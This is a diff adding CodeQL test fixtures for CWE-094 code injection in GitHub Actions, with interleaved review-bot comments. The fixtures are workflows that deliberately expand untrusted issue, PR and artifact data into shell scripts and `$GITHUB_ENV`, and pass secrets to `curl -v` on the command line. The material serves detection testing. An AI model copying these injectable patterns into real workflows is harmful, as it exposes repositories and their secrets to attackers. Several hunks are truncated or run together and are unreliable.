description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m pip install --upgrade pip wheel + # pip install -q 
git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name 
should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + # this action is not called in the test + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml new file mode 100644 index 000000000000..398c0ee6a6e1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml 
@@ -0,0 +1,47 @@
+name: Clone repository
+description: Clone repository
+inputs:
+ title:
+ description: Title
+ required: true
+ forked-pr:
+ description: Whether the event is operating from a forked PR
+ required: true
+ fetch-depth:
+ description: Fetch depth for actions/checkout
+ default: "1"
+outputs:
+ result:
+ description: "result"
+ value: ${{ steps.out.outputs.replaced }}
+
+runs:
+ using: composite
+ steps:
+ - shell: bash
+ run: echo "${{ inputs.title }}"
+ - uses: frabert/replace-string-action@v2.5
+ id: out
+ with:
+ pattern: "\""
+ string: ${{ inputs.title }}
+ replace-with: 'foo'
+ flags: g
+ - id: out2
+ env:
+ FOO: ${{ inputs.title }}
+ shell: bash
+ run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT
+ - name: Clone branch
+ if: "!fromJSON(inputs.forked-pr)"
+ uses: actions/checkout@v3
+ with:
+ fetch-depth: ${{ inputs.fetch-depth }}
+ - name: Clone forked PR
+ if: fromJSON(inputs.forked-pr)
+ uses: actions/checkout@v3
+ with:
+ ref: refs/pull/${{ github.event.number }}/merge
+ fetch-depth: ${{ inputs.fetch-depth }}
+
+
diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml
new file mode 100644
index 000000000000..a8019fbbf145
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml
@@ -0,0 +1,258 @@ +# Ultralytics Actions 🚀, AGPL-3.0 License https://ultralytics.com/license + +name: "Ultralytics Actions" +author: "Ultralytics" +description: "Optimize code and docs with official Ultralytics Actions for syntax, spelling, and link checks." +branding: + icon: "code" + color: "blue" +inputs: + token: + description: "GitHub token" + required: true + labels: + description: "Run issue and PR auto-labeling" + required: false + default: "false" + python: + description: "Run Python formatting" + required: false + default: "false" + markdown: + description: "Run Markdown formatting (deprecated in favor of prettier)" + required: false + default: "false" + prettier: + description: "Run Prettier formatting for JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML" + required: false + default: "false" + swift: + description: "Run Swift formatting" + required: false + default: "false" + spelling: + description: "Run Spelling checks" + required: false + default: "false" + links: + description: "Run Broken Links checks" + required: false + default: "false" + summary: + description: "Run PR Summary" + required: false + default: "false" + openai_api_key: + description: "OpenAI API Key" + required: false + openai_model: + description: "OpenAI Model" + required: false + default: "gpt-4o" + first_issue_response: + description: "Example response to a new issue" + required: false + first_pr_response: + description: "Example response to a new PR" + required: false + github_username: + description: "GitHub username for commits" + required: false + default: "UltralyticsAssistant" + github_email: + description: "GitHub email for commits" + required: false + default: "web@ultralytics.com" + body: + description: "PR body" + required: false + default: "" +runs: + using: "composite" + steps: + - uses: astral-sh/setup-uv@v3 + - name: Install Dependencies + # Note tomli required for codespell with pyproject.toml + # For debug: + # python -m 
pip install --upgrade pip wheel + # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli + run: | + packages="ultralytics-actions" + if [ "${{ inputs.spelling }}" = "true" ]; then + packages="$packages codespell tomli" + fi + + # On macOS, don't use sudo as it can cause environment issues + if [ "$(uname)" = "Darwin" ]; then + pip install -q $packages + else + sudo env "PATH=$PATH" uv pip install --system $packages + fi + + ultralytics-actions-info + shell: bash + - shell: bash + run: | + echo "${{ inputs.body }}" + + # Checkout Repository ---------------------------------------------------------------------------------------------- + - name: Checkout Repository + if: github.event.action != 'closed' + uses: actions/checkout@v4 + with: + repository: ${{ github.event.pull_request.head.repo.full_name || github.repository }} + token: ${{ inputs.token }} + ref: ${{ github.head_ref || github.ref }} + fetch-depth: 0 + + # PR Summary ------------------------------------------------------------------------------------------------------- + - name: PR Summary + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.summary == 'true' && github.event.action != 'synchronize' + env: + GITHUB_TOKEN: ${{ inputs.token }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-summarize-pr + shell: bash + continue-on-error: true + + # Python formatting ------------------------------------------------------------------------------------------------ + # Ignores the following Docs rules to match Google-style docstrings: + # D100: Missing docstring in public module + # D104: Missing docstring in public package + # D203: 1 blank line required before class docstring + # D205: 1 blank line required between summary line and description + # D212: Multi-line docstring summary should start at the first line + # D213: Multi-line docstring summary should start at 
the second line + # D401: First line of docstring should be in imperative mood + # D406: Section name should end with a newline + # D407: Missing dashed underline after section + # D413: Missing blank line after last section + # --target-version is Python 3.8 for --extend-select UP (pyupgrade) + - name: Run Python + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.python == 'true' && github.event.action != 'closed' + run: | + ruff format \ + --line-length 120 \ + . || true + ruff check \ + --fix \ + --unsafe-fixes \ + --extend-select I,D,UP \ + --target-version py38 \ + --ignore D100,D104,D203,D205,D212,D213,D401,D406,D407,D413 \ + . || true + docformatter \ + --wrap-summaries 120 \ + --wrap-descriptions 120 \ + --pre-summary-newline \ + --close-quotes-on-newline \ + --in-place \ + --recursive \ + . + shell: bash + continue-on-error: true + + # Prettier (JavaScript, JSX, Angular, Vue, Flow, TypeScript, CSS, HTML, JSON, GraphQL, Markdown, YAML) ------------- + - name: Run Prettier + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + run: | + ultralytics-actions-update-markdown-code-blocks + npm install --global prettier + npx prettier --write "**/*.{js,jsx,ts,tsx,css,less,scss,json,yml,yaml,html,vue,svelte}" '!**/*lock.{json,yaml,yml}' '!**/*.lock' '!**/model.json' + # Handle Markdown separately + find . -name "*.md" ! -path "*/docs/*" -exec npx prettier --write {} + + if [ -d "./docs" ]; then + find ./docs -name "*.md" ! 
-path "*/reference/*" -exec npx prettier --tab-width 4 --write {} + + fi + shell: bash + continue-on-error: true + + # - name: Fix MkDocs reference section changes + # if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && (inputs.prettier == 'true' || inputs.markdown == 'true') && github.event.action != 'closed' + # run: | + # from pathlib import Path + # for file in Path("./docs").rglob('*.md'): + # content = file.read_text() + # updated_content = content.replace(".\_","._") + # file.write_text(updated_content) + # shell: python + # continue-on-error: true + + # Swift formatting ------------------------------------------------------------------------------------------------- + - name: Run Swift Formatter + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.swift == 'true' && github.event.action != 'closed' + run: | + brew install swift-format + swift-format --in-place --recursive . + shell: bash + continue-on-error: true + + # Spelling --------------------------------------------------------------------------------------------------------- + - name: Run Codespell + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && inputs.spelling == 'true' && github.event.action != 'closed' + run: | + codespell \ + --write-changes \ + --ignore-words-list "crate,nd,ned,strack,dota,ane,segway,fo,gool,winn,commend,bloc,nam,afterall,skelton,goin" \ + --skip "*.pt,*.pth,*.torchscript,*.onnx,*.tflite,*.pb,*.bin,*.param,*.mlmodel,*.engine,*.npy,*.data*,*.csv,*pnnx*,*venv*,*translat*,*lock*,__pycache__*,*.ico,*.jpg,*.png,*.mp4,*.mov,/runs,/.git,./docs/??/*.md,./docs/mkdocs_??.yml" + shell: bash + continue-on-error: true + + # Autolabel Issues and PRs (run before commit changes in case commit fails) ---------------------------------------- + - name: Autolabel Issues and PRs + if: inputs.labels == 'true' && (github.event.action == 'opened' || github.event.action == 
'created') + env: + GITHUB_TOKEN: ${{ inputs.token }} + FIRST_ISSUE_RESPONSE: ${{ inputs.first_issue_response }} + FIRST_PR_RESPONSE: ${{ inputs.first_pr_response }} + OPENAI_API_KEY: ${{ inputs.openai_api_key }} + OPENAI_MODEL: ${{ inputs.openai_model }} + run: | + ultralytics-actions-first-interaction + shell: bash + continue-on-error: true + + # Commit Changes --------------------------------------------------------------------------------------------------- + - name: Commit and Push Changes + if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' + run: | + git config --global user.name "${{ inputs.github_username }}" + git config --global user.email "${{ inputs.github_email }}" + git pull origin ${{ github.head_ref || github.ref }} + git add . + git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token + if ! git diff --staged --quiet; then + git commit -m "Auto-format by https://ultralytics.com/actions" + git push + else + echo "No changes to commit" + fi + shell: bash + continue-on-error: false + + # Broken links ----------------------------------------------------------------------------------------------------- + - name: Broken Link Checker + if: inputs.links == 'true' && github.event.action != 'closed' + uses: lycheeverse/lychee-action@v2.0.2 + with: + # Check all markdown and html files in repo. 
Ignores the following status codes to reduce false positives: + # - 403(OpenVINO, "forbidden") + # - 429(Instagram, "too many requests") + # - 500(Zenodo, "cached") + # - 502(Zenodo, "bad gateway") + # - 999(LinkedIn, "unknown status code") + args: | + --scheme https + --timeout 60 + --insecure + --accept 403,429,500,502,999 + --exclude-all-private + --exclude "https?://(www\.)?(github\.com|linkedin\.com|twitter\.com|instagram\.com|kaggle\.com|fonts\.gstatic\.com|url\.com)" + "./**/*.md" + "./**/*.html" + token: ${{ inputs.token }} + output: ../lychee/results.md + fail: true + continue-on-error: false diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml new file mode 100644 index 000000000000..7b9c57354882 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -0,0 +1,29 @@ +name: Issue Workflow + +on: + issues: + types: [opened, edited] + +jobs: + redirectIssue: + runs-on: ubuntu-latest + name: Check for issue transfer + env: + content_analysis_response: undefined + steps: + - uses: actions/checkout@v2 + - name: Remove conflicting chars + env: + ISSUE_TITLE: ${{github.event.issue.title}} + uses: frabert/replace-string-action@1.2 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_TITLE}} + replace-with: "-" + - name: Check info + id: check-info + run: | + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 000000000000..5cf7bbd4e6bd --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml 
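Review bot: In `Commit and Push Changes`, `git pull origin ${{ github.head_ref || github.ref }}` and the two `git config --global` lines expand `github.head_ref`, `inputs.github_username` and `inputs.github_email` into the bash script text; on `pull_request_target` the head branch name is chosen by the PR author, so this is the same expression-injection sink the fixture exercises with `echo "${{ inputs.body }}"`. The action already routes `inputs.token` and `inputs.openai_api_key` through `env:`, so the same form fits here: add `HEAD_REF: ${{ github.head_ref || github.ref }}` under the step's `env:` and use `git pull origin "$HEAD_REF"`. Since `Checkout Repository` checks out `github.event.pull_request.head.repo.full_name` at `github.head_ref` with `inputs.token` and later steps push, the fixture also contains a checkout-then-push with a privileged token; a comment naming the step the CWE-094 test expects to flag would make the intended alert explicit.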
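Review bot: The `Remove conflicting chars` step only replaces `"` in the issue title, so `steps.remove_quotations.outputs.replaced`, which `Check info` then expands inside `echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV`, still carries `$(`, backticks and newlines from the title; the replace step is not a sanitizer for that shell sink, and a comment above it such as `# replace-string only strips quotes; its output remains attacker-controlled` would record that the expected taint flow passes through the third-party action's output. `frabert/replace-string-action@1.2` is referenced without the `v` prefix used elsewhere in this commit (`@v1.2` in cross3.yml, `@v2.5` in the action fixtures); if the same tag is intended it should be `@v1.2`. Writing the derived value to `$GITHUB_ENV` with a plain `echo` also lets a newline in the title define further variables; the `name<<EOF … EOF` delimiter form, whose remnant appears in publishResults.yml for `$GITHUB_OUTPUT`, is the documented way to write such values.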
@@ -0,0 +1,28 @@ +name: Preview Deploy + +on: + workflow_run: + workflows: ["Preview Build"] + types: + - completed + +jobs: + success: + runs-on: ubuntu-latest + if: github.event.workflow_run.event == 'pull_request' && github.event.workflow_run.conclusion == 'success' + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{ github.event.workflow_run.workflow_id }} + name: pr + + - name: save PR id + id: pr + run: echo "::set-output name=id::$( + ${{ github.event.workflow_run.event == 'pull_request' && + github.event.workflow_run.conclusion == 'success' }} + steps: + - name: Download artifacts + uses: actions/github-script@v7.0.1 + with: + script: | + var artifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: ${{github.event.workflow_run.id }}, + }); + console.log(artifacts); + var matchArtifact = artifacts.data.artifacts.filter((artifact) => { + return artifact.name == "input-artifacts" + })[0]; + var download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + var fs = require('fs'); + fs.writeFileSync('${{github.workspace}}/input.zip', Buffer.from(download.data)); + - name: Set needed env vars in outputs + id: prepare + run: | + unzip input.zip + echo current directory contents + ls -al + + echo Reading PR number + tmp=$(> $GITHUB_OUTPUT + + - run: echo ${{ steps.prepare.outputs.pr }} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml new file mode 100644 index 000000000000..63acdc612b0e --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml 
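Review bot: The final `- run: echo ${{ steps.prepare.outputs.pr }}` expands a value that the `prepare` step read out of `input.zip`, an artifact downloaded from the triggering `workflow_run`, into the script text; when the triggering event is `pull_request` that artifact is produced by the PR's code, so the fixture exercises artifact-sourced expression injection rather than an event-payload field, which a comment on `prepare` such as `# pr number is read from the untrusted artifact` should state. The `save PR id` step uses `::set-output`, which GitHub has deprecated in favour of writing to `$GITHUB_OUTPUT` as `prepare` already does; the command after `$(` is truncated in this view, so I cannot confirm what it reads. The hunk also appears to contain a second job definition (a `steps:` list with `actions/github-script@v7.0.1`) after the first job, so the file boundaries should be checked against the raw patch.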
@@ -0,0 +1,22 @@ +# Second Workflow +# It consumes an artifact produced by the First Workflow + +on: workflow_run +jobs: + my-second-job: + runs-on: ubuntu-latest + steps: + - name: download pr artifact + uses: dawidd6/action-download-artifact@v2 + with: + workflow: ${{github.event.workflow_run.workflow_id}} + run_id: ${{github.event.workflow_run.id}} + name: artifact + + # Save PR id to output + - name: Save artifact data + id: artifact + run: echo "::set-output name=id::$(> $GITHUB_ENV + + #labels the issue based in the text returned in content_analysis_response var + - name: Label issue + if: env.content_analysis_response != 'Valid' + #Uses DYNAMOBOTTOKEN to allow interaction between repos + run: | + curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }} -d '{"labels": ["${{env.content_analysis_response}}"]}' ${{ github.event.issue.url }}/labels + + #This job will scan the issue content to determing if more information is needed and act acordingly + #Will only run if the "redirectIssue" job outputted a 'Valid' result + checkIssueInformation: + if: needs.redirectIssue.outputs.result == 'Valid' + name: Check for missing information + #Wait for the previous job to finish as it needs its output + needs: redirectIssue + runs-on: ubuntu-latest + env: + #The 'analysis_response' variable is used to store the script response on step one, + #and then checked on step two to know if adding the label and comment is necessary. + #The initial 'undefined' value will be overridden when the script runs. + analysis_response: undefined + #Greetings for valid issues + greetings_comment: "Thank you for submitting the issue to us. We are sorry to + see you get stuck with your workflow. While waiting for our team member to respond, + please feel free to browse our forum at https://forum.dynamobim.com/ for more Dynamo related information." + #Comment intro + comment_intro: "Hello ${{ github.actor }}, thank you for submitting this issue! 
+ We are super excited that you want to help us make Dynamo all that it can be." + #issue_coment holds the comment format, while the missing information will be provided by analysis_response + needs_more_info_comment: "However, we need some more information in order for the Dynamo + team to investigate any further.\\n\\n" + #comment to be used if the issue is closed due to the template being empty + close_issue_comment: "However, given that there has been no additional information added, + this issue will be closed for now. Please reopen and provide additional + information if you wish the Dynamo team to investigate further.\\n\\n" + #Info asked from the user in bot comments + info_needed: "Additional information:\\n + - Filling in of the provided Template (What did you do, What did you expect to see, + What did you see instead, What packages or external references (if any) were used)\\n + - Attaching the Stack Trace (Error message that shows up when Dynamo crashes - You can copy and paste this into the Github Issue)\\n + - Upload a .DYN file that showcases the issue in action and any additional needed files, such as Revit + (Note: If you cannot share a project, you can recreate this in a quick mock-up file)\\n + - Upload a Screenshot of the error messages you see (Hover over the offending node and showcase + said errors message in the screenshot)\\n + - Reproducible steps on how to create the error in question." 
+ #Text to ask for specific missing information (complemented by the analysis response) + specific_info: "Can you please fill in the following to the best of your ability:" + #template file name + template: "ISSUE_TEMPLATE.md" + #label to tag the issue with if its missing information + issue_label: needs more info + #amount of sections from the template that can be missing information for the issue to still be considered complete + acceptable_missing_info: 1 + steps: + #Checkout the repo + - uses: actions/checkout@v4 + + #Removes conflicting characters before using the issue content as a script parameter + - name: Remove conflicting chars + env: + ISSUE_BODY: ${{github.event.issue.body}} + uses: frabert/replace-string-action@v2.5 + id: remove_quotations + with: + pattern: "\"" + string: ${{env.ISSUE_BODY}} + replace-with: '-' + flags: g + + #Checks for missing information inside the issue content + - name: Check Information + id: check-info + env: + ISSUE_BODY: ${{ steps.remove_quotations.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}" )" >> $GITHUB_ENV + + #Closes the issue if the analysis response is "Empty" + - name: Close issue + if: env.analysis_response == 'Empty' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.comment_intro}} ${{env.close_issue_comment}} ${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X PATCH -d '{"state": "closed"}' ${{ github.event.issue.url }} + + #Adds the "needs more info" label if needed + - name: Label and comment issue + if: ((env.analysis_response != 'Valid') && (env.analysis_response != 'Empty') && (github.event.action == 'opened')) + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"labels": ["${{env.issue_label}}"]}' ${{ github.event.issue.url }}/labels + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": 
"${{env.comment_intro}} ${{env.needs_more_info_comment}} ${{env.specific_info}} ${{env.analysis_response}}.\n\n${{env.info_needed}}"}' ${{ github.event.issue.url }}/comments + + #Removes the "needs more info" label if the issue has the missing information + - name: Unlabel updated issue + if: env.analysis_response == 'Valid' && github.event.action == 'edited' + run: | + echo urldecode ${{env.issue_label}} + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -X DELETE ${{ github.event.issue.url }}/labels/$(echo -ne "${{env.issue_label}}" | xxd -plain | tr -d '\n' | sed 's/\(..\)/%\1/g') + + #Adds greetings message + - name: Greetings + if: env.analysis_response == 'Valid' && github.event.action == 'opened' + run: | + curl -v -u admin:${{ secrets.GITHUB_TOKEN }} -d '{"body": "${{env.greetings_comment}}"}' ${{ github.event.issue.url }}/comments + + diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml new file mode 100644 index 000000000000..ef8269151d73 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/cross2.yml 
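Review bot: The `Check Information` step writes the output of `issue_analyzer.ps1`, computed from the issue body, to `$GITHUB_ENV` with a single `echo "analysis_response=$(...)"`; a newline in that output defines further variables for every later step, and `Label and comment issue` then re-expands the value as `${{env.analysis_response}}` inside the `curl -d '...'` JSON, so the quote stripping done by `Remove conflicting chars` (and by the same step in the earlier job, whose `run` expands `${{env.content_analysis_response}}` the same way) does not bound it. Writing with the delimiter form (`echo "analysis_response<<EOF"`, the value, then `echo "EOF"`, all appended to `$GITHUB_ENV`) and referencing `$analysis_response` from bash instead of `${{env.analysis_response}}` keeps the value out of the script text; if those curl lines are the intended sinks, a comment saying so would make the expected alert explicit. Separately, `curl -v -u admin:${{ secrets.DYNAMOBOTTOKEN }}` and the `secrets.GITHUB_TOKEN` calls put the credential on the command line and, with `-v`, print the `Authorization: Basic` header whose base64 form is not the masked secret string; `curl -u "admin:$TOKEN"` with the token supplied via `env:` and without `-v` avoids both. The opening lines of this hunk (`artifactpoisoning4.yml`) appear to run into a second, unrelated issue workflow after `::set-output name=id::$(`, so the file split should be checked in the raw patch.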
@@ -0,0 +1,110 @@ +# issue_type_predicter.yml (https://github.com/Bughalla/dynamods_dynamo/blob/1c1d3e29ee9bca81b43d78f22bf953100ef67009/.github/workflows/issue_type_predicter.yml#L40-L40) +name: Issue Type Predicter +# This workflow uses https://github.com/DynamoDS/IssuesTypePredicter to predict the type of a github issue + +permissions: {} +on: + issues: + types: [opened, edited] + +jobs: + issue_type_Predicter: + name: Issue Type Predicter + runs-on: ubuntu-latest + env: + # The 'analysis_response' variable is used to store the response returned by issue_analyzer.ps1 + # The initial 'undefined' value will be overridden when the script runs + analysis_response: undefined + # The 'parsed_issue_body' variable is used to store the parsed issue body (after removing some sections of the body like Stack Trace) + parsed_issue_body: undefined + # The 'issue_json_string' variable is used to store parsed info of the issue body as a json string + issue_json_string: undefined + # The 'is_wish_list' variable is used to store the value returned by the IssuesTypePredicter project + is_wish_list: undefined + # issue template file name + template: "ISSUE_TEMPLATE.md" + # amount of sections from the template that can be missing information for the issue to still be considered valid + acceptable_missing_info: 1 + + steps: + # Checkout Dynamo repo + - name: Checkout Dynamo Repo + uses: actions/checkout@v4 + + # Removes quotes before using the issue content as a script parameter + - name: Remove Quotes + id: remove_quotes + uses: frabert/replace-string-action@v2.5 + env: + ISSUE_BODY: ${{ github.event.issue.body }} + with: + pattern: "\"" + string: ${{ env.ISSUE_BODY }} + replace-with: '-' + + # Analyze for missing information inside the issue content + - name: Analyze Issue Body + env: + ISSUE_BODY: ${{ steps.remove_quotes.outputs.replaced }} + run: | + echo "analysis_response=$(pwsh .\\.github\\scripts\\issue_analyzer.ps1 "${{ env.template }}" "${{ env.acceptable_missing_info }}")" 
